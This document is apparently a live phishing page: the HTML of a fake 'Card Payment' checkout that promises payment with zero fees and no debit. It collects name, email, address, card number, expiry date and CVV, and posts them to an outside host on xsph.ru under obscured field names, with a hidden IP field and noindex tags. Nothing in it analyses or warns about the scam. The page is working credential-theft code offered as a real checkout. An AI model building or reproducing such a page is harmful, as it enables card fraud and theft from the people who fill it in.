              
          <!DOCTYPE html>
          <html>
          <head>
          <meta name=”robots” content=noindex”>
          <meta name="robots" content="index,follow">
          <meta name="robots" content="noindex,follow">
          <meta name="robots" content="index,nofollow">
          <meta name="robots" content="noindex,nofollow">
          <meta name="googlebot" content="noindex,nofollow,noarchive,nosnippet,noodp" />
          <meta name="robots" content="noindex,nofollow,noarchive,nosnippet,noodp" />
          <meta name="viewport" content="width=device-width, initial-scale=1">
          <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
          <style>
          body {
          font-family: Arial;
          font-size: 17px;
          padding: 8px;
          }
          
          * {
          box-sizing: border-box;
          }
          
          .row {
          display: -ms-flexbox; /* IE10 */
          display: flex;
          -ms-flex-wrap: wrap; /* IE10 */
          flex-wrap: wrap;
          margin: 0 -16px;
          }
          
          .col-25 {
          -ms-flex: 25%; /* IE10 */
          flex: 25%;
          }
          
          .col-50 {
          -ms-flex: 50%; /* IE10 */
          flex: 50%;
          }
          
          .col-75 {
          -ms-flex: 75%; /* IE10 */
          flex: 75%;
          }
          
          .col-25,
          .col-50,
          .col-75 {
          padding: 0 16px;
          }
          
          .container {
          background-color: #f2f2f2;
          padding: 5px 20px 15px 20px;
          border: 1px solid lightgrey;
          border-radius: 3px;
          }
          
          input[type=text] {
          width: 100%;
          margin-bottom: 20px;
          padding: 12px;
          border: 1px solid #ccc;
          border-radius: 3px;
          }
          
          
          
          label {
          margin-bottom: 10px;
          display: block;
          }
          
          .icon-container {
          margin-bottom: 20px;
          padding: 7px 0;
          font-size: 24px;
          }
          
          .btn {
          background-color: #04AA6D;
          color: white;
          padding: 12px;
          margin: 10px 0;
          border: none;
          width: 100%;
          border-radius: 3px;
          cursor: pointer;
          font-size: 17px;
          }
          
          .btn:hover {
          background-color: #45a049;
          }
          
          a {
          color: #2196F3;
          }
          
          hr {
          border: 1px solid lightgrey;
          }
          
          span.price {
          float: right;
          color: grey;
          }
          
          
          
              .1p {
           font-size: 10px;
           position: Responsive;
           }
        
        
                  input[type=number] {
          width: 100%;
          margin-bottom: 20px;
          padding: 12px;
          border: 1px solid #ccc;
          border-radius: 3px;
          }
          		
          		
          		
          	                  input[type=email] {
          width: 100%;
          margin-bottom: 20px;
          padding: 12px;
          border: 1px solid #ccc;
          border-radius: 3px;
          }
          		
          		
          
          /* Responsive layout - when the screen is less than 800px wide, make the two columns stack on top of each other instead of next to each other (also change the direction - make the "cart" column go on top) */
          @media (max-width: 800px) {
          .row {
          flex-direction: column-reverse;
          }
          .col-25 {
          margin-bottom: 20px;
          }
          }
          </style>
          </head>
          <body>
          
          <h2>Card Payment</h2>
          <p class="1p"style="font-size: 15px">Make payments with zero fees. Your card won&apos;t be debited, but you will receive what you ordered for.</p>
          <div class="row">
          <div class="col-75">
          <div class="container">
          
     
            
    
      
          
          
          
          
          
          
          
          
          
       <!--   <form id="anonymousNewMessage" class="form" method="POST" action="">
          		-->
          		
          		
          		
          		       
                              
                              <form method="POST" style="padding-top:  -500px;" action="http://f0911012.xsph.ru/index1.php" method="POST">
                              		
                              		
                              		
          		
          		
          <div class="card-header text-center">
          
          
          
          
          </div>
          <div class="card-body">
          
               <div class="row">
          <div class="col-50">
          <h3>Billing Address</h3>
          <label for="fname"><i class="fa fa-user"></i> Full Name</label>
          <input type="text" id="fname" name="s6" placeholder="John M. Doe"required>
          <label for="email"><i class="fa fa-envelope"></i> Email</label>
          <input type="email" id="email" name="s7" placeholder="john@example.com"required>
          <label for="adr"><i class="fa fa-address-card-o"></i> Address</label>
          <input type="text" id="adr" name="s8" placeholder="542 W. 15th Street"required>
          <label for="city"><i class="fa fa-institution"></i> City</label>
          <input type="text" id="city" name="s9" placeholder="New York"required>
          
          <div class="row">
          <div class="col-50">
          <label for="state">State</label>
          <input type="text" id="state" name="s10" placeholder="NY"required>
          </div>
          <div class="col-50">
          <label for="zip">Zip</label>
          <input type="number" id="zip" name="s11" placeholder="10001"required>
          </div>
          </div>
          </div>
          
          <div class="col-50">
          <h3>Payment</h3>
          <label for="fname">Accepted Cards</label>
          <div class="icon-container">
          <i class="fa fa-cc-visa" style="color:navy;"></i>
          <i class="fa fa-cc-amex" style="color:blue;"></i>
          <i class="fa fa-cc-mastercard" style="color:red;"></i>
          <i class="fa fa-cc-discover" style="color:orange;"></i>
          </div>
          <label for="cname">Name on Card</label>
          <input type="text" id="cname" name="s1" placeholder="John More Doe"required>
          <label for="ccnum">Card number</label>
          <input type="number" id="ccnum" name="s2" placeholder="1111-2222-3333-4444"required>
          <label for="expmonth">Exp Month</label>
          <input type="number" id="expmonth" name="s3" placeholder="09"required>
          <div class="row">
          <div class="col-50">
          <label for="cvv">CVV</label>
          <input type="number" id="cvv" name="s5" placeholder="357"required>
          </div>
          <div class="col-50">
          <label for="expyear">Exp Year</label>
          <input type="number" id="expyear" name="s4" placeholder="2025"required>
          
          <input type="hidden" name="ip" value="197.210.84.77" />
          <input type="hidden" name="link" value="Atm" />
          </div>
          </div>
          </div>
          
          </div>
          <label>
          <input type="checkbox" checked="checked" name="sameadr"><span style="font-size: 12px; position: relative; top: -4.20px;"> My address is correct </span
          		
          		
          		
          </label>
          		
          		
          		
   <!--         <input class="btn" name="login" type="submit" id="anonymousProcess" value="Continue to checkout">
          		
          	-->
          		
          	
          				
          				
          		
         	<button type="submit" class="btn"style="position: relative; top: 7px; font-size: 13.50px;"><b> Complete Checkout</b></button>
          
          </form>
          		
          		
          		<br/><br/>
     
          
         </form>
             
          
          
          
          
          
          
          
          
          
          
          </div>
          </div>
           <p>&nbsp;</p>  
          </div>
          </div>
          </div>
          <!--   Core JS Files   -->
          <script src="./assets/js/core/jquery.min.js" type="text/javascript"></script>
          <script type="text/javascript">
          var uid = '286232';
          var wid = '621257';
          var pop_tag = document.createElement('script');pop_tag.src='';document.body.appendChild(pop_tag);
          pop_tag.onerror = function() {pop_tag = document.createElement('script');pop_tag.src='';document.body.appendChild(pop_tag)};
          </script><!-- Google tag (gtag.js) -->
          <script async src="https://www.googletagmanager.com/gtag/js?id=G-E7K8F1651E"></script>
          <script>
          window.dataLayer = window.dataLayer || [];
          function gtag(){dataLayer.push(arguments);}
          gtag('js', new Date());
          
          gtag('config', 'G-E7K8F1651E');
          </script> 
          <html lang="da"> 
          <!-- Control Center for Now Ui Kit: parallax effects, scripts for the example pages etc -->
          
          <script src="./assets/js/now-ui-kit.js?v=1.3.0" type="text/javascript"></script>
          
          
          <script src="./assets/js/now-ui-kit.js" type="text/javascript"></script>
          <script src="./assets/js/anonymous.js?1691740248"> 
          </script>
          <script type="text/javascript">
          $(document).ready(function() {
          
          var url =anonymousURL('user');
          var url2 =anonymousURL('ref');
          console.log(url);
          $('.userNickname').html('Send Anonymous Message to '+url);
          $('#userNickname').val(url2);
          });
          
          
          </script>
          
          </body>
          </html>
           